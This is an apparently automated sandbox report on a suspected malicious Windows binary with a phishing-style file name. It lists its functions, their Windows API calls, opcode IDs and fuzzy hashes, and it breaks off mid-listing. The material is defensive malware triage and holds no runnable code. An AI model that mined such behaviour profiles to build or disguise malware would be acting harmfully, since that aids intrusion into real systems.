                                                        • Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                        • Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
                                                        • Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                        • Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D
                                                        Function 004350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00435101
                                                          • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                          • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                          • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00A60000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free
                                                        • String ID:
                                                        • API String ID: 614378929-0
                                                        • Opcode ID: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                        • Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
                                                        • Opcode Fuzzy Hash: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                        • Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C
                                                        Function 004044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 004044CF
                                                          • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
                                                          • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
                                                          • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00404524
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                        • String ID:
                                                        • API String ID: 1378193009-0
                                                        • Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                        • Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
                                                        • Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                        • Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49
                                                        Function 00476369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00476399
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004763A4
                                                        • _memmove.LIBCMT ref: 004763D1
                                                        • inet_ntoa.WSOCK32(?), ref: 004763DC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                        • String ID:
                                                        • API String ID: 1504782959-0
                                                        • Opcode ID: ebe779451b8fe17377772976d37213f5a324d7049d93d61360c19b924476f115
                                                        • Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
                                                        • Opcode Fuzzy Hash: ebe779451b8fe17377772976d37213f5a324d7049d93d61360c19b924476f115
                                                        • Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69
                                                        Function 00458B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                        • Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
                                                        • Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                        • Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94
                                                        Function 00401290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                        • GetClientRect.USER32(?,?), ref: 0043B5FB
                                                        • GetCursorPos.USER32(?), ref: 0043B605
                                                        • ScreenToClient.USER32(?,?), ref: 0043B610
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                        • String ID:
                                                        • API String ID: 4127811313-0
                                                        • Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                        • Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
                                                        • Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                        • Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9
                                                        Function 016B218B Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,016B15D8,00000000,00000000,?,016B2132,016B15D8,00000000,00000000,00000000,?,016B2283,00000006,FlsSetValue), ref: 016B21BD
                                                        • GetLastError.KERNEL32(?,016B2132,016B15D8,00000000,00000000,00000000,?,016B2283,00000006,FlsSetValue,016C6FC4,FlsSetValue,00000000,00000364,?,016B192D), ref: 016B21C9
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,016B2132,016B15D8,00000000,00000000,00000000,?,016B2283,00000006,FlsSetValue,016C6FC4,FlsSetValue,00000000), ref: 016B21D7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad$ErrorLast
                                                        • String ID:
                                                        • API String ID: 3177248105-0
                                                        • Opcode ID: 08f37b3f18d21c595636982e3f151a1dbf3e24968ee200a12316244b64a1141f
                                                        • Instruction ID: b3161b5d9d4a28dd97ffe4718f0e281b62f36582ac97e63675a90640f982f331
                                                        • Opcode Fuzzy Hash: 08f37b3f18d21c595636982e3f151a1dbf3e24968ee200a12316244b64a1141f
                                                        • Instruction Fuzzy Hash: 5101F736601232ABC73149ACECD4EA73BDCAF05BA27200628FB15E3244C720E891C7F0
                                                        Function 00436FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                        • Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85
                                                        Function 0048B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 0048B2E4
                                                        • ScreenToClient.USER32(?,?), ref: 0048B2FC
                                                        • ScreenToClient.USER32(?,?), ref: 0048B320
                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                        • String ID:
                                                        • API String ID: 357397906-0
                                                        • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                        • Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
                                                        • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                        • Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94
                                                        Function 00466BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00466BE6
                                                          • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
                                                        • _memmove.LIBCMT ref: 00466C09
                                                        • _memset.LIBCMT ref: 00466C16
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00466C26
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                        • String ID:
                                                        • API String ID: 48991266-0
                                                        • Opcode ID: c8299cc4facb39f843d1e84b6b18623dbee28ecd43af281709d82dcdf59c4b38
                                                        • Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
                                                        • Opcode Fuzzy Hash: c8299cc4facb39f843d1e84b6b18623dbee28ecd43af281709d82dcdf59c4b38
                                                        • Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9
                                                        Function 00402218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 00402231
                                                        • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                                                        • SetBkMode.GDI32(?,00000001), ref: 00402250
                                                        • GetStockObject.GDI32(00000005), ref: 00402258
                                                        • GetWindowDC.USER32(?,00000000), ref: 0043BE83
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
                                                        • GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
                                                        • ReleaseDC.USER32(?,00000000), ref: 0043BEED
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                        • String ID:
                                                        • API String ID: 1946975507-0
                                                        • Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                        • Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
                                                        • Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                        • Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16
                                                        Function 00458712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 0045871B
                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CurrentOpenProcessThreadToken
                                                        • String ID:
                                                        • API String ID: 3974789173-0
                                                        • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                        • Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
                                                        • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                        • Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
                                                        Function 00406240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %I
                                                        • API String ID: 0-63094095
                                                        • Opcode ID: 942e1b8f80069f074c1b2c40e5fc917702e3634c8d599ac88492e2e2913508d1
                                                        • Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
                                                        • Opcode Fuzzy Hash: 942e1b8f80069f074c1b2c40e5fc917702e3634c8d599ac88492e2e2913508d1
                                                        • Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E
                                                        Function 0047AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __itow_s
                                                        • String ID: xbL$xbL
                                                        • API String ID: 3653519197-3351732020
                                                        • Opcode ID: 0c6e0354c0013d4fee92ce69e041035a0e24d46cdf1018baf1def671b28a307b
                                                        • Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
                                                        • Opcode Fuzzy Hash: 0c6e0354c0013d4fee92ce69e041035a0e24d46cdf1018baf1def671b28a307b
                                                        • Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99
                                                        Function 016AFAF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 211COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: pow
                                                        • API String ID: 0-2276729525
                                                        • Opcode ID: e46505395a015d3ac6e3c8d5a556b290717f80799406f7fba81adcf9788dab35
                                                        • Instruction ID: f6b91612cdf4cc877152b737963d4fcd13acdc3489e77dc426d1447fd97299f9
                                                        • Opcode Fuzzy Hash: e46505395a015d3ac6e3c8d5a556b290717f80799406f7fba81adcf9788dab35
                                                        • Instruction Fuzzy Hash: 77513A61A08102A6DB227B1CDDA03BF7BA4DB41741F5089ADE89642399EF358CD6CF47
                                                        Function 0046AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                        • __wcsnicmp.LIBCMT ref: 0046B02D
                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
